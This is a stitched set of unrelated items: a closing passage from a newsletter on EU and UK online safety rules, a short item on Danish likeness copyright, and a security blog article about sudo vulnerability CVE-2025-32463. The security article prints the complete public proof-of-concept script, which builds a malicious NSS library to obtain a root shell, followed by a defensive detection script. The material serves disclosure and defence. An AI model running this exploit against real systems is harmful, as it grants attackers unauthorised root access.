To a degree, the time lag is understandable. Regulators are always going to be behind the curve on the latest threats. Both agencies are still staffing up and learning the ropes of their new rulebooks. How successful either the EU or UK will be in making their online worlds safer for citizens won't be known for at least five years, at the earliest.

But there have been some serious mistakes, especially from the European Commission. Let's leave aside the political nature of the first investigations under the Digital Services Act. And let's leave aside the internal bureaucratic infighting that was always going to arise from such a powerful — and well-resourced — piece of legislation.

For me, the biggest error was how Ursula von der Leyen framed the new rules as almost exclusively a means for combatting Russian interference. That was done primarily to secure her second tenure as European Commission president. But the characterization of the Digital Services Act as an all-powerful mechanism to thwart the Kremlin's covert influence operations has continued well into this year — most notably in the two presidential elections in Romania.


Let's be clear. These online safety rules are many things. But, at their heart, they are wonky, bureaucratic and cumbersome mandatory requirements for platforms to abide by their own internal policies against illegal content. They are not about Russian disinformation. And they certainly are not about censorship.

Weaponization and unknown unknowns


And that takes me to the final big concern within the Fake News Factory: the weaponization of online safety rules. Since 2016, there have been those within the US that pushed back hard against platforms' efforts to quell illegal and abusive content. That has spiralled into conspiratorial claims that a Censorship Industrial Complex — made up of governments, social media giants and outsiders — is trying to illegally silence predominantly rightwing voices, often via new online safety legislation.

US President Donald Trump's administration has made it clear what it thinks of these rules — and has pushed back hard. It has threatened retaliatory tariffs against countries with online safety rules on the books. It has threatened to ban anyone who allegedly tries to censor Americans from entering the country. It has accused both the UK and EU of infringing on US First Amendment rights.

These attacks against what are, essentially, legal commitments obligating companies to live by their own internal rules — and to demonstrate that they have done so — are now part of the conversation in other Western countries. That includes (mostly) right-wing lawmakers across Europe seeking to weaken these online safety rules, accusing others of censoring conservative viewpoints and mimicking many of the long-standing talking points from their US counterparts.

It's true, particularly during the pandemic, that social media companies made content moderation decisions with imperfect facts. Some posts were unfairly removed or downranked as these firms responded, in real time, to government efforts to amplify scientifically correct information. But the rise of conspiracy theories, which insinuated a mass censoring of online voices, just didn't bear out with the evidence at hand. And that came after repeated reports from the US House of Representatives select subcommittee on the weaponization of the federal government.

If there was evidence of such abuse, then I would be the first to champion such findings. But as we enter the second half of the year, there is one core underlying fact that underpins everything I've written so far: no one has a clue about what happens on these platforms.

Long-time Digital Politics readers will have heard me go on about this for months — and, to be fair, it's part of my day job to look into this issue. But how the complex recommender system algorithms interact with people's individual posts, paid-for advertising and wider efforts to influence people online remains a black box. What I have outlined above, for instance, is based on my own research, what I understand anecdotally about how these platforms work and discussions with policymakers, tech executives and other experts.

The Fake News Factory is my own imagining of how the current online information ecosystem interacts and shapes the world around us. But without better awareness — via mandatory requirements that these firms open up to independent scrutiny, transparency and accountability — about the inner workings of these platforms, that imagining will remain incomplete, at best.

We are entering a new generation of social media with limited awareness, mass balkanization and an increasing politicization of what should be clear objectives of keeping everyone safe online. How long this era will stick around for is anyone's guess. But, for now, the Fake News Factory remains as strong as ever.


What I'm reading


— The Organization for Economic Cooperation and Development analyzed the so-called age assurance policies from 50 online services — most of which did not have checks in place. More here.

— The team at the DSA Observatory did a deep dive into how individuals, non-profit organizations and consumer groups can bring private enforcement actions under the EU's Digital Services Act.

— The UK's Competition and Markets Authority laid out its rationale for why it had designated Google a so-called "strategic market status" under the country's new digital antitrust rules. More here.

— OpenAI submitted recommendations to the upcoming US AI Action Plan. The words "freedom" and "PRC" are mentioned repeatedly throughout. More here.

— Researchers at USC Annenberg looked at how the media covered the negative side of social media/technology, and found that the companies are rarely blamed. More here.



digitalpolitics.co/newsletter0…



Finally, An Extension To Copyright Law We Can Get Behind


Normally when a government extends a piece of copyright law we expect it to be in the favour of commercial interests with deep pockets and little care for their consumers. But in Denmark they do things differently it seems, which is why they are giving Danes the copyright over their own features such as their faces or voices. Why? To combat deepfakes, meaning that if you deepfake a Dane, they can come after you for big bucks, or indeed kronor. It’s a major win, in privacy terms.

You might of course ask, whether it’s now risky to photograph a Dane. We are not of course lawyers here but like any journalists we have to possess a knowledge of how copyright works, and we are guessing that the idea in play here is that of passing off. If you take a photograph of a Volkswagen you will have captured the VW logo on its front, but the car company will not sue you because you are not passing off something that’s not a Volkswagen as the real thing. So it will be with Danes; if you take a picture of their now-copyrighted face in a crowd you are not passing it off as anything but a real picture of them, so we think you should be safe.

We welcome this move, and wish other countries would follow suit.


Pope Francis, Midjourney, Public domain, (Which is a copyright story all of its own!)


hackaday.com/2025/07/02/finall…




Linux Pwned! Privilege Escalation on SUDO in 5 seconds. HackerHood tests the CVE-2025-32463 exploit


Yesterday, Red Hot Cyber published an in-depth look at a serious vulnerability discovered in SUDO (CVE-2025-32463), which allows privilege escalation to root on Linux systems by abusing the chroot function.

The exploit, made public by Stratascale, shows how an unprivileged user can obtain root access through a precise chain of operations that exploit incorrect behaviour in the handling of child processes in chroot environments.

Field test: over to Manuel Roccon of the HackerHood group


Manuel Roccon, a researcher in Red Hot Cyber's HackerHood group, wanted to get his hands on the exploit to verify its real-world impact and assess its reproducibility in real environments. “I couldn't resist the temptation to try it in an isolated environment. It is striking how direct and clean the mechanism is, once the requirements of the PoC are met,” says Manuel.

The team then tested the Proof of Concept published by Stratascale, Exploit CVE-2025-32463 – sudo chroot. The result? Privilege escalation achieved successfully.

youtube.com/embed/-GxiqS-f7Yg?…

Exploit details


The exploit relies on a condition in which sudo runs a command in a chroot environment but leaves the child process some ways to get out of the chroot and manipulate the process namespace until it gains full access as root.

The CVE-2025-32463 exploit, demonstrated in the sudo-chwoot.sh PoC by Rich Mirch (Stratascale CRU), takes advantage of a vulnerability in sudo that lets an unprivileged user obtain root privileges when sudo is run with the -R option (which specifies a chroot directory). The script creates a temporary environment (/tmp/sudowoot.stage.*), compiles a malicious shared library (libnss_/woot1337.so.2) containing a constructor function that elevates privileges and opens a root shell (/bin/bash), and forces sudo to load it as an NSS library in the chroot context.

The technique exploits a logic error in how NSS libraries are handled in chroot environments, where sudo dynamically loads external libraries without isolating them properly. The script sets up a fake nsswitch.conf configuration to force the use of its own library, placing it inside the woot/ directory, which acts as the virtual root for the chroot. When sudo -R woot woot is run, the woot1337.so.2 library is loaded and its code runs automatically thanks to the __attribute__((constructor)) attribute, yielding the privilege escalation.

The basic requirements for successfully exploiting this vulnerability include:

  • chroot use through sudo being enabled.
  • The absence of certain restrictions in security profiles (such as AppArmor or SELinux).
  • A permissive sudoers configuration.

Below are the few simple lines:

#!/bin/bash
# sudo-chwoot.sh
# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch
# @ Stratascale Cyber Research Unit (CRU)
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1

cat > woot1337.c <<EOF
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void woot(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  execl("/bin/bash", "/bin/bash", NULL);
}
EOF

mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c

echo "woot!"
sudo -R woot woot
rm -rf ${STAGE?}

Conclusions


The test carried out by Manuel Roccon shows that this vulnerability is not merely theoretical but fully exploitable in production environments that are not properly protected. In DevOps or containerized scenarios, where the use of sudo and chroot is common, the risks increase considerably.

Red Hot Cyber and the HackerHood group recommend updating SUDO immediately to the latest available version and reviewing the security configurations related to chroot and sudoers permissions.
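
For defenders reviewing hosts, the traces described above (a fake root holding etc/nsswitch.conf with a path-like source such as "passwd: /woot1337", a libnss_ directory beside it, and sudo invoked with -R) can be hunted for directly. The following is an added example, not part of the original article or of the Stratascale PoC; the function names are hypothetical, and the sample directory and command line are constructed.

```python
import os
import re
import shlex
import tempfile

NSS_LINE = re.compile(r"^\s*([A-Za-z_]+)\s*:\s*(.*)$")
OPTS_WITH_ARG = {"-C", "-D", "-g", "-h", "-p", "-r", "-t", "-T", "-U", "-u"}  # per sudo(8)


def suspicious_nss_sources(conf_text):
    """Return (database, source) pairs whose source name contains '/'."""
    # glibc loads source X from libnss_X.so.2; the PoC's "/woot1337" makes that a path.
    hits = []
    for raw in conf_text.splitlines():
        m = NSS_LINE.match(raw.split("#", 1)[0])
        if m:
            rest = re.sub(r"\[[^\]]*\]", " ", m.group(2))  # drop [NOTFOUND=return]
            hits += [(m.group(1), s) for s in rest.split() if "/" in s]
    return hits


def scan_tree(root):
    """Report <dir>/etc/nsswitch.conf files under root with path-like sources."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if os.path.basename(dirpath) != "etc" or "nsswitch.conf" not in files:
            continue
        conf = os.path.join(dirpath, "nsswitch.conf")
        try:
            with open(conf, errors="replace") as fh:
                hits = suspicious_nss_sources(fh.read())
        except OSError:
            continue
        if hits:
            # The PoC keeps libnss_/ beside the fake root directory.
            stage = os.path.dirname(os.path.dirname(dirpath))
            has_lib = os.path.isdir(os.path.join(stage, "libnss_"))
            findings.append({"conf": conf, "sources": hits, "libnss_dir": has_lib})
    return findings


def sudo_chroot_dir(cmdline):
    """Return the directory passed to sudo -R/--chroot, or None."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes in the captured command line
        return None
    if not argv or os.path.basename(argv[0]) != "sudo":
        return None
    i = 1
    while i < len(argv) and argv[i].startswith("-") and argv[i] != "--":
        arg = argv[i]
        if arg in ("-R", "--chroot"):
            return argv[i + 1] if i + 1 < len(argv) else None
        if arg.startswith("--chroot="):
            return arg.split("=", 1)[1]
        if arg.startswith("-R"):
            return arg[2:]
        i += 2 if arg in OPTS_WITH_ARG else 1
    return None


def build_sample_stage(base):
    """Constructed sample: the PoC's directory layout, with no library in it."""
    os.makedirs(os.path.join(base, "woot", "etc"))
    os.makedirs(os.path.join(base, "libnss_"))
    with open(os.path.join(base, "woot", "etc", "nsswitch.conf"), "w") as fh:
        fh.write("passwd: /woot1337\n")


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_stage(tmp)
        print(scan_tree(tmp), sudo_chroot_dir("sudo -R woot woot"))
```

The PoC deletes its staging directory when the shell exits, so a file-system scan only catches an attempt in progress or one that was interrupted; pair it with process-execution telemetry. The command-line parser does not handle clustered short flags or long options given with a separate argument.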

Security starts with awareness. Keep following us for technical analyses, tested PoCs and up-to-date reports.

The article Linux Pwned! Privilege Escalation on SUDO in 5 seconds. HackerHood tests the CVE-2025-32463 exploit comes from il blog della sicurezza informatica.